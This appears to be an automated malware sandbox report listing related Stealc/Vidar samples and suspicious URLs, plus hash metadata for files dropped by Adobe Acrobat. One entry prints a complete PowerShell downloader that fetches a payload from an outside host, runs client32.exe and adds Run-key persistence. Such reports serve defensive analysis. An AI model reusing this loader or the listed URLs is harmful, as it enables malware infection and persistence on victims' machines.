                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0NGet hashmaliciousUnknownBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$HRBRG='https://hdlclub2.cc/work/das.php?7387';$VHFTQMWZL=(New-Object%20System.Net.WebClient).DownloadString($HRBRG);$ZLFHWXDCL=%5BSystem.Convert%5D::FromBase64String($VHFTQMWZL);$asd%20=%20Get-Random%20-Minimum%20-5%20-Maximum%2012;%20$ATADDMBRA=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CYWYSGSQHQ'+$asd;if%20(!(Test-Path%20$ATADDMBRA%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$ATADDMBRA%20-ItemType%20Directory%20%7D;$p=Join-Path%20$ATADDMBRA%20'CXCC.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$ZLFHWXDCL);try%20%7B%20%20%20%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$ATADDMBRA)%7D%20catch%20%7B%20%20%20%20Write-Host%20'Failed:%20'%20+%20$_;%20%20%20%20exit%7D;$CV=Join-Path%20$ATADDMBRA%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7BWrite-Host%20'No%20exe.'%7D;$fd=Get-Item%20$ATADDMBRA%20-Force;%20$fd.attributes='Hidden';$s=$ATADDMBRA+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='NXXUI';$ASDASD='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$ASDASD;Get hashmaliciousUnknownBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                NGy4YdKSwE.exeGet hashmaliciousStealc, VidarBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                NlpWS1Iq5Z.exeGet hashmaliciousStealc, VidarBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                https://bioaquatictesting-my.sharepoint.com/:f:/g/personal/securedocument_bio-aquatic_com/EqfT1pjHkSVIsZ_uZ-FoAy4BgWwRj-5I-q_oaUpvi5Mxeg?e=eaqeTTGet hashmaliciousUnknownBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                https://frs1sctxxr.shop/1stSourceGet hashmaliciousUnknownBrowse
                                                • 4.175.87.197
                                                • 184.28.90.27
                                                • 13.107.246.60
                                                No context
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):292
                                                Entropy (8bit):5.186225285924393
                                                Encrypted:false
                                                SSDEEP:6:bjIq2Pwkn2nKuAl9OmbnIFUt8yFZZmw+xdkwOwkn2nKuAl9OmbjLJ:gvYfHAahFUt8WZ/+xd5JfHAaSJ
                                                MD5:0536B5C7BC2048D9AD7EEBA7A4C3EEF2
                                                SHA1:FECFB7CEEEE023FF47EB6DDA9898E6F3278CA20C
                                                SHA-256:4E40042FD95BD893634F84E890391620FC29514CBEFC65E00E133403E901FD0D
                                                SHA-512:590795C8DDDEAEB74B845FC2CAC6C48034B288E9862E6F6300B42F6A7EA70614B69E98BA8E8536CA46C89C0020215059EAF2CFEC6411252E0355E75269AF62C9
                                                Malicious:false
                                                Reputation:low
                                                Preview:2024/10/29-19:21:50.027 13d4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/29-19:21:50.030 13d4 Recovering log #3.2024/10/29-19:21:50.031 13d4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):292
                                                Entropy (8bit):5.186225285924393
                                                Encrypted:false
                                                SSDEEP:6:bjIq2Pwkn2nKuAl9OmbnIFUt8yFZZmw+xdkwOwkn2nKuAl9OmbjLJ:gvYfHAahFUt8WZ/+xd5JfHAaSJ
                                                MD5:0536B5C7BC2048D9AD7EEBA7A4C3EEF2
                                                SHA1:FECFB7CEEEE023FF47EB6DDA9898E6F3278CA20C
                                                SHA-256:4E40042FD95BD893634F84E890391620FC29514CBEFC65E00E133403E901FD0D
                                                SHA-512:590795C8DDDEAEB74B845FC2CAC6C48034B288E9862E6F6300B42F6A7EA70614B69E98BA8E8536CA46C89C0020215059EAF2CFEC6411252E0355E75269AF62C9
                                                Malicious:false
                                                Reputation:low
                                                Preview:2024/10/29-19:21:50.027 13d4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/29-19:21:50.030 13d4 Recovering log #3.2024/10/29-19:21:50.031 13d4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):336
                                                Entropy (8bit):5.160438655198385
                                                Encrypted:false
                                                SSDEEP:6:b9+q2Pwkn2nKuAl9Ombzo2jMGIFUt8JJZmw+S9VkwOwkn2nKuAl9Ombzo2jMmLJ:cvYfHAa8uFUt8j/+M5JfHAa8RJ
                                                MD5:0D6263F14D0B685E79086EDA35FC7057
                                                SHA1:CC4EA65ACE04E5BC2D21DC24A08D0CA6C90508CB
                                                SHA-256:B65BF396E879CAA7EA9F9FC5415E42DAA377931BD329FDA51FA51DD66DBAD699
                                                SHA-512:BB7601205B4B13E8556FE2197A18804C449C567D460AB5F0C7F63031DE361BBAFCEB2F1A8F1878873DC4E78268C2A5EA1D2F970F48649E7637F63E931A610172
                                                Malicious:false
                                                Reputation:low
                                                Preview:2024/10/29-19:21:50.131 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/29-19:21:50.132 1c08 Recovering log #3.2024/10/29-19:21:50.133 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):336
                                                Entropy (8bit):5.160438655198385
                                                Encrypted:false
                                                SSDEEP:6:b9+q2Pwkn2nKuAl9Ombzo2jMGIFUt8JJZmw+S9VkwOwkn2nKuAl9Ombzo2jMmLJ:cvYfHAa8uFUt8j/+M5JfHAa8RJ
                                                MD5:0D6263F14D0B685E79086EDA35FC7057
                                                SHA1:CC4EA65ACE04E5BC2D21DC24A08D0CA6C90508CB
                                                SHA-256:B65BF396E879CAA7EA9F9FC5415E42DAA377931BD329FDA51FA51DD66DBAD699
                                                SHA-512:BB7601205B4B13E8556FE2197A18804C449C567D460AB5F0C7F63031DE361BBAFCEB2F1A8F1878873DC4E78268C2A5EA1D2F970F48649E7637F63E931A610172
                                                Malicious:false
                                                Reputation:low
                                                Preview:2024/10/29-19:21:50.131 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/29-19:21:50.132 1c08 Recovering log #3.2024/10/29-19:21:50.133 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):475
                                                Entropy (8bit):4.970025147355236
                                                Encrypted:false
                                                SSDEEP:12:YH/um3RA8sqtVSsBdOg2HpFcaq3QYiubInP7E4T3y:Y2sRdsidMHpk3QYhbG7nby
                                                MD5:64F48F8EC3F71AEA1760962D0EE23017
                                                SHA1:3A14943538945CB419C2B39846C80AC6EA208E1F
                                                SHA-256:5DE0E470292B0A65FCD5C7EB8D96190AEF3CDDD72FBA396931256651FD067D39
                                                SHA-512:578799382D8C35890958092D990B6870A995F03B5663A29560BF0995E477C1E6A5F400E28B0DB8BCD82BBB111AD4236B1E33FF6AB8BAC176F74C915EB1805AC8
                                                Malicious:false
                                                Reputation:low
                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13374804115962217","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":237357},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:JSON data
                                                Category:modified
                                                Size (bytes):475
                                                Entropy (8bit):4.970025147355236
                                                Encrypted:false
                                                SSDEEP:12:YH/um3RA8sqtVSsBdOg2HpFcaq3QYiubInP7E4T3y:Y2sRdsidMHpk3QYhbG7nby
                                                MD5:64F48F8EC3F71AEA1760962D0EE23017
                                                SHA1:3A14943538945CB419C2B39846C80AC6EA208E1F
                                                SHA-256:5DE0E470292B0A65FCD5C7EB8D96190AEF3CDDD72FBA396931256651FD067D39
                                                SHA-512:578799382D8C35890958092D990B6870A995F03B5663A29560BF0995E477C1E6A5F400E28B0DB8BCD82BBB111AD4236B1E33FF6AB8BAC176F74C915EB1805AC8
                                                Malicious:false
                                                Reputation:low
                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13374804115962217","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":237357},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4730
                                                Entropy (8bit):5.250686628975982
                                                Encrypted:false
                                                SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7dIqwtQtcLqZ:etJCV4FiN/jTN/2r8Mta02fEhgO73goD
                                                MD5:3D59FA69B0BE8F6B037B03F181A7F924
                                                SHA1:6BF5C23266C7334DA1E07775FAFD23BD6CBB6111
                                                SHA-256:807BC286579B5E6ED50CAA2A2CB890CD469FF5973C236B65E3198FB1EC8A3AB7
                                                SHA-512:0B4A999B49C28CA3C4A6BBF15C9910514253CCCDA6056B4354C97B838C44A9761D705E69B9A5ACEF57B4F0416150FB40DBF8E44D86840EE1DED44DD716458B39
                                                Malicious:false
                                                Reputation:low
                                                Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):324
                                                Entropy (8bit):5.160744755728819
                                                Encrypted:false
                                                SSDEEP:6:J9+q2Pwkn2nKuAl9OmbzNMxIFUt8kJZmw+79VkwOwkn2nKuAl9OmbzNMFLJ:qvYfHAa8jFUt8G/+f5JfHAa84J
                                                MD5:C849075ABD135EF306A70AFC0E3A8389
                                                SHA1:68DDF800E5A2618213CE944F2FC002743BA055F4
                                                SHA-256:E6935E1864060CD812A71530673558B03F9B81A0353FD880F9034467D2411183
                                                SHA-512:FCDF56640BBFD7C15DBCCB06E8D0164E68E237C1A7DDCE2A9E1CB0FC2145E4E5BA5B8D2F0AEB5BD1F465CBAA9502B2927F273F23DFF193A6006EAF9797886D3C
                                                Malicious:false
                                                Preview:2024/10/29-19:21:50.230 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/29-19:21:50.232 1c08 Recovering log #3.2024/10/29-19:21:50.233 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:ASCII text
                                                Category:dropped
                                                Size (bytes):324
                                                Entropy (8bit):5.160744755728819
                                                Encrypted:false
                                                SSDEEP:6:J9+q2Pwkn2nKuAl9OmbzNMxIFUt8kJZmw+79VkwOwkn2nKuAl9OmbzNMFLJ:qvYfHAa8jFUt8G/+f5JfHAa84J
                                                MD5:C849075ABD135EF306A70AFC0E3A8389
                                                SHA1:68DDF800E5A2618213CE944F2FC002743BA055F4
                                                SHA-256:E6935E1864060CD812A71530673558B03F9B81A0353FD880F9034467D2411183
                                                SHA-512:FCDF56640BBFD7C15DBCCB06E8D0164E68E237C1A7DDCE2A9E1CB0FC2145E4E5BA5B8D2F0AEB5BD1F465CBAA9502B2927F273F23DFF193A6006EAF9797886D3C
                                                Malicious:false
                                                Preview:2024/10/29-19:21:50.230 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/29-19:21:50.232 1c08 Recovering log #3.2024/10/29-19:21:50.233 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                Category:dropped
                                                Size (bytes):71190
                                                Entropy (8bit):0.8925789725187765
                                                Encrypted:false
                                                SSDEEP:96:FSOi2L7Lgj5oTYvsbbVjbu9mwvhvqXWenfqgDRAbpUttbF0XNwMEmHMGFYVyNx:sOf828sbbNbK/FqGQfRAbpUxyxYVc
                                                MD5:659213ADE1C883E112BE7BF21B5C1708
                                                SHA1:BB7D5F7BD3E912407CFC855C820504BDEB527971
                                                SHA-256:84A49DCA8A11E60F27D57E61A0DAA245808EC6A57C24D63AC2311C1DFB80E582
                                                SHA-512:68B35EC1136A1B021EE8BB1D44E9E5E4295FA1B766E4B2AF426B1E27BBD119F215AE388A7FF9841E689D3B6FCD62D26D0D3752ED46C6E1969A8502AF89969F02
                                                Malicious:false
                                                Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                Category:dropped
                                                Size (bytes):86016
                                                Entropy (8bit):4.444816304132676
                                                Encrypted:false
                                                SSDEEP:384:yezci5teiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rxs3OazzU89UTTgUL
                                                MD5:37ED73355BA61547AC49D7226C4BED40
                                                SHA1:9ED09134F763C7C09D5149152DF90EFFFD4DF5B6
                                                SHA-256:B222CA77905E65A68ECA3FF72BB22C6494129A5CAF0265DB5FEEA4CA70EA388E
                                                SHA-512:E51956D7D0C8A8C473DC29381A2D3A03BBE397498FF85BD43F51B01758A03DFF37B8EDB548D86B85FDD1D9495734FE8A238F126F1F76BD9F82420037EEC0407E
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite Rollback Journal
                                                Category:dropped
                                                Size (bytes):8720
                                                Entropy (8bit):3.77364031044658
                                                Encrypted:false
                                                SSDEEP:48:7M8p/E2ioyVqqioy9oWoy1Cwoy1vZKOioy1noy1AYoy1Wioy1hioybioyFToy1ni:7zpjupFkXKQocb9IVXEBodRBk5
                                                MD5:69075E5595A4FF554D416EB8CDB0C2FD
                                                SHA1:99A91E8112F1BE88483F9A2ABA8A53205EABC90A
                                                SHA-256:AE675DDC696550782D9F683ECE1638DEEB6F22B47F3A67CD56CAD282FBE6BF21
                                                SHA-512:F1AB78E058514009C267DE8392EB1D22F0CCDE28B74A7F5DFD15C277CAE807619E2AB2102757381639A0559F6B180A84A841F861F4155B8D3ECEE98DE4AB10C2
                                                Malicious:false
                                                Preview:.... .c......A.q...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:Certificate, Version=3
                                                Category:dropped
                                                Size (bytes):1391
                                                Entropy (8bit):7.705940075877404
                                                Encrypted:false
                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                Malicious:false
                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                Category:dropped
                                                Size (bytes):71954
                                                Entropy (8bit):7.996617769952133
                                                Encrypted:true
                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                Malicious:false
                                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):192
                                                Entropy (8bit):2.7673182398396405
                                                Encrypted:false
                                                SSDEEP:3:kkFklj+AklXfllXlE/HT8kWXNNX8RolJuRdxLlGB9lQRYwpDdt:kKVfIT8xNMa8RdWBwRd
                                                MD5:17361DED7594296E9E94CD9E127B0DF1
                                                SHA1:0129CBC44405FC54E162F769895BEE6FD7188A6C
                                                SHA-256:DE35598E127007BDF13E83467943CC80AB2A972F51351C11E68F36F3D92987FA
                                                SHA-512:739BDEFCF86DAB031D6B754D53C8984D702730EB7F7358670CFEEFBC0589BB85EADB042B89095D91A3B78F61BB7B70F73C585C7FABEB9FEC4E4C7DE61032DBFA
                                                Malicious:false
                                                Preview:p...... ........P..\Y*..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):328
                                                Entropy (8bit):3.2342081569012398
                                                Encrypted:false
                                                SSDEEP:6:kKRLO99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:JDImsLNkPlE99SNxAhUe/3
                                                MD5:45B5850C7ED7570E39800D1FF9865C57
                                                SHA1:CEC7FA4B28D3F3B2144631E36A6DFDB9C6A4E2AD
                                                SHA-256:A49ABAEB5C2214D81EF22FC867C24D0BB61E094D288791AE4BD93077ED84C92E
                                                SHA-512:AE56DBAE4D0A22393A4F47119FC4120763E25C484A11F704D22052FBEF1C620646BDE7B33E36CAC6FDA05B6BD3412ABCBC903021AB80CAA3CF468A21F3BE2C6E
                                                Malicious:false
                                                Preview:p...... ........Bb.nY*..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:PostScript document text
                                                Category:dropped
                                                Size (bytes):185099
                                                Entropy (8bit):5.182478651346149
                                                Encrypted:false
                                                SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                Malicious:false
                                                Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):243196
                                                Entropy (8bit):3.3450692389394283
                                                Encrypted:false
                                                SSDEEP:1536:vKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqErRo+RQn:yPClJ/3AYvYwghFo+RQn
                                                MD5:F5567C4FF4AB049B696D3BE0DD72A793
                                                SHA1:EBEADDE9FF0AF2C201A5F7CC747C9EA61CFA6916
                                                SHA-256:D8DBFE71873929825A420F73821F3FF0254D51984FAAA82E1B89D31188F77C04
                                                SHA-512:E769735991E5B1331E259608854D00CDA4F3E92285FDC500158CBD09CBCCEAD8A387F78256A43919B13EBE70C995D19242377C315B0CCBBD4F813251608C1D56
                                                Malicious:false
